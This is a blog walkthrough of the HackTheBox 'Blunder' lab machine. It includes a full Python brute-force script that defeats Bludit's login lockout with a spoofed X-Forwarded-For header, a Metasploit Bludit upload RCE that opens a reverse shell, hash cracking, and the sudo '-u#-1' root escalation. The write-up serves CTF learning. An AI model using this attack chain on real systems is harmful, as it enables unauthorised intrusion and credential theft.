Hackthebox – Blunder

As with any machine, Blunder also gets several portscans

root@kalivm:~/Blunder# nmap -A -oN fullscan-A 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 11:19 CEST 
Nmap scan report for 10.10.10.191 (10.10.10.191)
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   13.09 ms 10.10.14.1 (10.10.14.1)
2   13.10 ms 10.10.10.191 (10.10.10.191)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.98 seconds

Only port 80 open, time to check out what’s on there.

bludit main page on blunder
A first visit showed this blog with some articles about various topics. Nothing too interesting yet so I kept looking.
bludit login page on blunder
One thing I noticed was that just adding /admin on the page, showed this login page which could be interesting as well.

root@kalivm:~/Blunder# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://10.10.10.191/ -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.191/
[+] Threads:        40
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/01 11:25:16 Starting gobuster
===============================================================
/install.php (Status: 200)
/.htaccess (Status: 403)
/robots.txt (Status: 200)
/.html (Status: 403)
/.php (Status: 403)
/.htpasswd (Status: 403)
/.htm (Status: 403)
/.htpasswds (Status: 403)
/.gitignore (Status: 200)
/.htgroup (Status: 403)
/wp-forum.phps (Status: 403)
/.htaccess.bak (Status: 403)
/.htuser (Status: 403)
/.ht (Status: 403)
/.htc (Status: 403)
/todo.txt (Status: 200)
===============================================================
2020/06/01 11:29:42 Finished
===============================================================

Some files are accessible, making it clear why this box is called Blunder. Besides the install.php and .gitignore files, which did not contain much of interest, a robots.txt and todo.txt file, lets check those out to see if there is anything interesting in them.

root@kalivm:~/Blunder# curl http://10.10.10.191/robots.txt
User-agent: *
Allow: /
root@kalivm:~/Blunder# curl http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

Apparently fergus needs to know some things. This might be useful as a username so keep it in mind. After some further searching, nothing of particular interest was found so I decided to create a wordlist off the blog and see if I could use that to login. Since I noticed the CSRF token in the login screen, I started some brief research about how to brute force with CSRF tokens and found several blogs writing about it, including this blog about bypassing the brute-force protection on bludit. After some small alteration of the script on that website I let it take an argument as input for the password list, connect to the Blunder box and set the username to fergus.

#!/usr/bin/env python3
import re
import requests
import sys

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

# Generate 50 incorrect passwords
for line in open(sys.argv[1],"r"):
    wordlist.append(line.strip())

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

I let it run it against the CMS with the wordlist I created from the blog.

root@kalivm:~/Blunder# python3 bludit_brute.py blunder.txt
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
---snip---
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

blunder logged in
Fergus’ password is RolandDeschain, and after quick verification, I saw that I was able to login. Now I had also already found that there was a metasploit exploit for Bludit which, with authentication, allowed remote code execution, so I fired up Metasploit

root@kalivm:~/Blunder# msfconsole
msf5 > search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability

msf5 > use 0
msf5 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2

So I set this payload for usage and check which options need to be set.

msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading zaCrNlNPAp.png...
[*] Uploading .htaccess...
[*] Executing zaCrNlNPAp.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.191:45660) at 2020-06-01 13:31:58 +0200
[+] Deleted .htaccess
meterpreter > shell
Process 6056 created.
Channel 0 created.
whoami
www-data

After starting a decent shell with python, I was now able to browse through the filesystem and check for anything to gain access to a normal user. I already noticed home directories for users Hugo and Shaun being present in /home. After browsing through the various www directories, I found some interesting entries by searching for passwords:

www-data@blunder:~$ grep -ri '"password":' ./
grep -ri '"password":' ./
./bludit-3.10.0a/bl-plugins/bl-languages/ja_JP.json:    "password": "パスワード",
./bludit-3.10.0a/bl-content/databases/users.php:        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", 
---snip---
./bludit-3.9.2/bl-content/databases/users.php:        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
./bludit-3.9.2/bl-content/databases/users.php:        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
---snip---

These looked like Sha1 hashes and, given the way bludit works, may very well be passwords that can be cracked.
blunder cracked hashes
After throwing them into crackstation, it appeared that only one of them could be cracked, so I decided to take a look at the bludit-3.10.0 users.php file.

www-data@blunder:~$ cat bludit-3.10.0a/bl-content/databases/users.php
cat bludit-3.10.0a/bl-content/databases/users.php

{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

So this was Hugo’s password, from the other two hashes, it became apparent that they were salted, explaining why crackstation did not crack them. Perhaps I can now use this password to become Hugo on the shell I got.

www-data@blunder:~$ su - hugo
su - hugo
Password: Password120

hugo@blunder:~$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

And that worked, now I’m hugo, and I already found during recon that the user.txt file was is in his home directory, so all I need to do is obtain that flag!

hugo@blunder:~$ cat user.txt
cat user.txt
2b612e<NOFLAG>fc8de85cf9373ac54b

And there is the user flag!

Privilege Escalation

After obtaining the user flag, privilege escalation was done quite quickly on this box.

hugo@blunder:~$ sudo -l
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

Now one thing I was not yet aware of, and after some playing around on the box I asked for a nudge on Discord, I was pointed to the fact that this sudo configuration has a known exploit on exploitDB. After that, the flag was only one query, and two commands away.

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat root.txt
9d606f8<NOFLAG>ad9a0d4e9584648fa

And now I’ve got the root flag too.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.